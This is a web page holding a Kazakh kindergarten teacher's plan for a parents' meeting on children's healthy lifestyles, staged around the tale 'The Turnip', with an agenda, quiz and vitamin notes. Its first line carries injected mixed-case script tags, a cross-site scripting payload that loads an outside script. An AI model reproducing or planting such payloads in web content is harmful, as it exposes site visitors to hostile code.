<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

28.02.2018

№14 «Достық» балабақшасы Ата-аналар жиналысы

Тақырыбы: «Салауатты өмір салты-баланың дамуына зор мәні бар»

(Шалқан» ертегісінің желісі бойынша)

Тәрбиеші: Қалдырбаева К.Е

Көкшетау қаласы

Ата –аналар жиналысы

Тақырыбы: «Салауатты өмір салты-баланың дамуына зор мәні бар»

Міндеттері:

1.    Ата-аналарғасалауатты өмір салты туралы білімдерін кеңейту.

2.    Өзденсаулықтарын,бала денсаулығына көп көңіл бөле білу.

3.    Үйтұрмысында салауатты өмір салтын сақтау.

Көрнекіліктер:

1.    Жоба:  «Денсаулық-зор байлық» видео- слайд

2.    Буклеттер«Салауатты өмір салты»

3.    Ата-аналарғакеңестер

4.    Денсаулықтуралы мақал-мәтелдер

5.    «Шалқан»ертегісіне қажетті киім-костюмдер

Алдын-аладайындаған жұмыстар:

1.    Шақыруқағаздары

2.    Жобаәзірлеу

3.    Буклеттердайындау

4.    Ата-аналарғажадынама  «Салауатты тамақтануға арналғанжемістер»

5.    Балардыңсурет көрмесі .  «Салауатты өмір салтынқалаймыз»

6.    Ата-аналармен  ертегіге дайындық.

Тәрбиеші:

Тыңдаңыз, бұл даланың үні қандай?

Қараңыз, отбасының гүлі қандай?

Шақырып ортамызға аналарды

Сырласып, бәріміз танысайық!

(Ата-аналарды ортаға шақыру.)

 Тәрбиеші   сөйлейді: « Салауатты отбасы »

Жайсаң жаз өтті,күз келді

Саз тоғайды бақты,даланы

Шақырмайды түз де енді

Гүл теруге баланы.

Енді қызық мұнда деп,

Күтті бақша есігі

Салауатты отбасы

Жиналыпты төріңе

Сәт-сапар тілеп бәріңе

Бастайық, рұқсатетсеңіз,сіздерді жиналысымызда қаралатын күн тәртібіндегі мәселелерментаныстырайын.

  Күн тәртібіндеқаралатын мәселелер:

1.    Ата-аналарментанысу рәсімі. Ойын:  «Эстафета-сөзі»

2.    Балабақшадиректорына сөз беру.

3.    Жобаментаныстыру. Тақырыбы: «Денсаулық-зор байлық» видео-слайд

4.    Викториналықсұрақ-жауаптар.

5.    «Шебер-класс» -аналармен қойылым көрсету.  «Шалқан»ертегісі

6.    Ата-аналарға жадынама сыйлау.

Ойын:  «Эстафета-сөзі»

1.    - Құрметтіата-ана!

Балаңыздыңденсаулығы жақсы болу үшін не істер едіңіз?- деп массаждық допты лақтыра отырыпәр ата-ананың ойын білу.

2.    - Мен  Марал Қазбекқызы Әмірдің анасымын.

Баламның денсаулығы жақсы болу үшін ең бірінші күн тәртібін сақтаймыз.бассейнға апарамыз, далада ойнайды,көп дәрумендер беремін - деп айтады әрі қарай барлық ата-аналар өз ойларын  білдіреді.

2. Балабақша меңгерушісі 

....................................«Салауатты өмір салты"    туралы ата-аналарға  ақпарат береді

3.  «Денсаулық-зор байлық»  видео-слайд.

Тәрбиеші: Қалдырбаева Көпей Ехияқызы  теледидардан айтып отырып көрсетеді.

Бұл видео-слайдта балалардың «Салауатты өмір салты» туралы өз ойлары, пікірлері де көрсетіліп кетеді.

3.     Викториналық сұрақ-жауаптар.

Әрбір үстелдің үстінде күзгі жапырақтар жатады,сол жапырақтарда сұрақтар жазылған

1.     «Салауатты өмір салты» дегеніміз не?

2.    Денсаулыққазиянды әдеттер,олар қандай?

3.    Денсаулықжақсы болу үшін не істеу керек?

4.    Денсаулығыжақсы - деп қандай адамды айтамыз?

5.    «Шебер-класс»  (ата-аналар сахналық костюмдер киіп сахналайды)

«Шалқан»  ертегісін сахналау

Ертегінің соңында шалқанда бар дәрумендер туралы көрсетіп айтып береді.

Шалқанда В1, В2,С дәрумендері бар.

В1- дәрумені көмірсулар айналымын,судың тепе-теңдігін реттейді.

В2 – дәрумені ағзаның өсуіне,заттардың алмасуына көмектеседі.

С – дәрумені қанның ұйығыштығын,ағзаның инфекцияларға

қарсы тұру қабілетін арттырады.

С- төзімділікті нығайтады, шаршағандықты күресуге көмектеседі.

В1,В2 – дәрумендері жүйке жүйесінің және бұлшықеттердің дұрыс қызмет етуіне жауап береді. көкөністер мен жемістерді жиі тамаққ пайдаланыңыздар, - деп айтады.

6.   Ата-аналарға жадынама сыйлау.

(алма қағазданқиылған ,оның артында «Салауаттытамақтануға арналған жемістер» жазылған)

  Жиналыстың қорытынды шешімі:

1. Біздің бүгінгі ата-аналар жиналысы «Салауатты өмір салтын сақтау» мақсатында өз денсаулықтарына көңіл бөлу.

2.  Баланың күн тәртібін сақтай білу, үйрету ,жаттықтыру.

3.  Балабақшада өтілетін денсаулық шараларына белсене қатысу.

 

 

Просмотров: 1186


Пікір қосу



Деректерді қолтаңбаға қосу